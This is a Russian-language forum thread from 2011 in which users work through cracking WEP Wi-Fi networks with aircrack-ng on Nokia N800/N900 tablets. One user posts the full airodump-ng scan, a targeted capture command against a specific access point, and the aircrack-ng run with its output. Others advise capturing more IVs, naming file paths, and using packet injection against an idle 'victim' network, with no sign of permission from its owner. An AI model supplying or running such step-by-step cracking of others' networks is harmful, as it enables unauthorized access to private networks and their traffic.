Re: aircrack
pavlov
Не прокатывает...
Пишет все время вы отсоединены...
Добавлено: 31.03.2011 19:02:54
pavlov
Или еще вот это:
ssh: connect to host 192.168.0.3 port 22: Connection timed out
Вы не вошли. Пожалуйста, войдите или зарегистрируйтесь.
Страницы Назад 1 … 10 11 12 13 14 15 Далее
Чтобы отправить ответ, вы должны войти или зарегистрироваться
pavlov
Не прокатывает...
Пишет все время вы отсоединены...
Добавлено: 31.03.2011 19:02:54
pavlov
Или еще вот это:
ssh: connect to host 192.168.0.3 port 22: Connection timed out
Dominic
Скорее всего 192.168.0.Х уже занят, это я так, для примера подал.
Лучше 192.168.15.1 на машине, соответственно 192.168.15.5 на n900
pavlov
Да все равно результат тот же...
ssh: connect to host 192.168.15.9 port 22: Connection timed out
даниил
Это значит что нет такого файла.. .Скорее всего нет директории tmp в MyDocs...
Я просто предварительно в MyDocs создал каталог tmp в которую пишу пакеты по взлому и собственно там пароли лежат, т.е. словари.. .
Добавлено: 31.03.2011 21:43:15
pavlov
Все получилось... Я тормоз просто... СПСБ...
Добавлено: 31.03.2011 21:44:26
даниил
с помощью pavlov я подключил n900 к компу через USB минуя Wi-Fi... Так что постараюсь выложить видео нормальное... Сейчас этим займусь.. .
А для чего программка то?
Вики даст полноценное определение http://ru.wikipedia.org/wiki/Aircrack-ng
У кого новости есть по этому продукту... В плане достижений и свершений?
Dominic
ну были какие-то обновления, за пару дней очень много пришло новых версий. а что нового, так и не понял
всем пт, вдохновился вашими успехами - попробую вписаться на ваш шабаш 900-х со своей таблеткой, ток не баньте плз))
Опираясь на эту статью решил попробовать вальнуть wep точку используя n800, для начала расшарил таблетку нужным репозиторием, поставил из диспетчера aircrack-ng(0.9.1-1) и wirelesstools, с этим никаких проблем.
1. под рутом ввожу:
airodump-ng wlan0
через пару минут стопорю Ctrl-C:
BSSID PWR Beacons #Data, #/s CH
00:21:91:99:8B:15 -1 21 6 0 6 54. WEP WEP
00:21:91:99:8B:18 -1 19 6 0 6 54. WEP WEP
00:3A:99:89:C6:00 -1 67 2 0 13 54. WEP WEP
00:3A:99:A2:FA:30 -1 293 20 0 4 54. WPA2
00:28:00:00:40:00 -1 0 0 0 -1 -1
00:3C:46:EE:40:00 -1 0 0 0 -1 -1
CH 4 ][ Elapsed: 1 min ][ 2011-07-01 14:25
CH 4 ][ Elapsed: 1 min ][ 2011-07-01 14:25 s CH
CH 10 ][ Elapsed: 1 min ][ 2011-07-01 14:25 s CH
CH 10 ][ Elapsed: 1 min ][ 2011-07-01 14:25 s CH
CH 10 ][ Elapsed: 1 min ][ 2011-07-01 14:25 s CH
CH 5 ][ Elapsed: 1 min ][ 2011-07-01 14:25 s CH
CH 5 ][ Elapsed: 1 min ][ 2011-07-01 14:25 s CH
BSSID PWR Beacons #Data, #/s CH
00:21:91:99:8B:15 -1 21 6 0 6 54. WEP WEP
00:21:91:99:8B:18 -1 19 6 0 6 54. WEP WEP
Nokia-N800-43-7:~#
имя точки не выдал, юзанул прогу с огрызка коллеги которая палит мас-адрес точки, так что норм, связал, выбрал нужный мас.
2. далее
airodump-ng -c 6 --bssid 00:21:91:99:8B:15 -w mycapture --ivs wlan0
через 8 минут сбора пакетов, выдал:
[ Elapsed: 7 mins ][ 2011-07-01 14:14
BSSID PWR RXQ Beacons #Data, #/s
00:21:91:99:8B:15 -1 75 3699 1416 0 6 54. WPA2
BSSID STATION PWR Lost
00:21:91:99:8B:15 F3:FB:44:CB:80:DC -1 0
1:91:99:8B:15 00:0E:35:F5:CA:64 -1 0
00:21:91:99:8B:15 00:0E:35:F5:CA:4C -1 0 30
00:21:91:99:8B:15 00:0E:35:F5:CA:64 -1 0 25
read failed: Network is down
Nokia-N800-43-7:~#
на мас-адресе протокол WPA2, хотя до этого был WEP, но об этом баге меня предупреждали в статье
3. пробую юзануть сохраненный файл:
Nokia-N800-43-7:~# aircrack-ng mycapture-01.ivs
Opening mycapture-01.ivs
Read 23 packets.
# BSSID ESSID Encryption
1 00:21:91:99:8B:15 WEP (23 IVs)
Choosing first network as target.
Not enough IVs available. You need about 250.000 IVs to crack
40-bit WEP, and more than 800.000 IVs to crack a 104-bit key.
Nokia-N800-43-7:~#
я фз как эт понимать, хелп гуру
L3N1
А чего не понятно тебе...
Там же все написанно по русски...
Not enough IVs available. You need about 250.000 IVs to crack
Типа что то такого, не хватило пакетов для подбора накачай 250 000 пакетов IVsov и попробуй снова...
На практике 128 битный пароль нужно 200 000 пакетов... Тебе он написал что если 40-битный то пакетов надо 800 000 но на сколько я знаю стандартные точки до 128 бит кодировку поддерживали... По крайней мере у менЯ так... Просто долови пакетов и опять пробуй...
Добавлено: 01.07.2011 16:05:52
L3N1 Даже не не правильно сказал... Оно тебе написало что для 40 битного надо 250 000 ivsov а для 104 более 800 000 ivsov... Хрень короче... В этой ветке выше есть нормаьная инструкция по взлому WEP и WPA Попробуй от туда пример стащить...
Добавлено: 01.07.2011 16:09:14
у тебя типа он пытался по 23 пакетам ломануть WEP не прокатит... Больше ловить надо... И я не понял, для чего тебе нужно было знать имя точки если есть MAC адрес?
Да, спс Dominic ознакомился с твоими гайдами по взлому WPA и WEP, по последнему как раз и пытался вроде ломать...
лан пакеты можно и добрать, токо как по логам посмотреть соко ты их набрал, какой параметр смотреть в логах..
и почему отлов их стопорится?: read failed: Network is down. слишком далеко от источника? не хватат памяти? что тут моно сделать, не подскажешь? заранее спасибо.
И я не понял, для чего тебе нужно было знать имя точки если есть MAC адрес?
Оо есть каманды подключиться к вафле используя токо мас-адресс через терминал? не поделишься?_))
L3N1
Слушай, ну вот блин тут умного не посоветую ничего потому что у нас кажись немного разное ПО...
отлов пакетов надо смотреть в столбике Data...
Вот как это значение перевалит после 200 000 можешь пробовать ломать...
Хотя можешь ломать и после 50 000 если не прокатит, повторяешь команду на отлов и они ловятся во второй файлик *-02.ivs и т.д.
По поводу стопора не знаю... У нас на N900 отловленные пакеты пишутся в папку ROOT, я опытным путем прописал путь другой... в папке MyDocs создал папку tmp и запись перехваченных пакетов стала осуществляться по адресу /home/user/MyDocs/tmp/work (где work любое имя присваемое отловленным пакетам). Ну и естественно когда вводишь команду на уже непосредственно взлом - нужно опять же указывать полный путь который ты прописывал до файла: aircrack-ng /home/user/MyDocs/work*.ivs (звездочка понятно же для чего) ...
Добавлено: 01.07.2011 16:40:48
Оо есть каманды подключиться к вафле используя токо мас-адресс через терминал? не поделишься?_))
Не поделюсь... Не жадный... Просто не знаю... Я при вопросе спросил про имя точки, зачем оно нужно было если у тебя в логе есть мак адрес... И еще... У меня airodump-ng не выдает имя точки тогда огда оно не помещается на экране (последний столбик), если до того как ты нажал Ctrl+C уменьшить масштаб шрифта повлетс столбик с именем точки...
L3N1
только сейчас дочитался... Ох уж эта старость...
...слишком далеко от источника?...
А ты перед непосредственно самим перехватом по команде airodump-ng получаешь таблицу сетей в радиусе действия...
Ты ее же смотришь, что там про уровень сигнала написанно? Это столбик pwr?
Я уже посмотрел твой лог... Странный оказатель "-1" У меня не так... У меня -37 к примеру - это значит 37% уровень сигнала... В принципе еси у тебя все правильно и по аналогии можно предположить что 1% уровнь сигнала... Хм... Ну не знаю... Кажется просто глюк... А если все же он действительно слабый, он не должен стопориться а просто будет простаивать... Вот сейчас попробовал во время перехвата выключил Вафлю, она просто пропала из списка сетей... Включил она появилась... Не стопорится... Может места под ROOT нет для пакетов (или у тебя на таблетке такого нет)???
L3N1
тебе нужно просто наловить больше пакетов.
а имя, на сколько я помню, не обязательно. достаточно указать только мак.
#airodump-ng --channel 1--bssid 00:14:9A:09:02:1E -w work --ivs wlan0
вот в таком виде
ошибку может выдавать, если твоя жертва отключилась
и он может не отлавливать дата-пакеты если точка не используется (через неё ничего не качается), тогда необходимы инъекции
Форум работает на PunBB, при поддержке Informer Technologies, Inc
Currently installed 6 official extensions. Copyright © 2003–2009 PunBB.
Сгенерировано за 0.115 секунды (94% PHP — 6% БД) 11 запросов к базе данных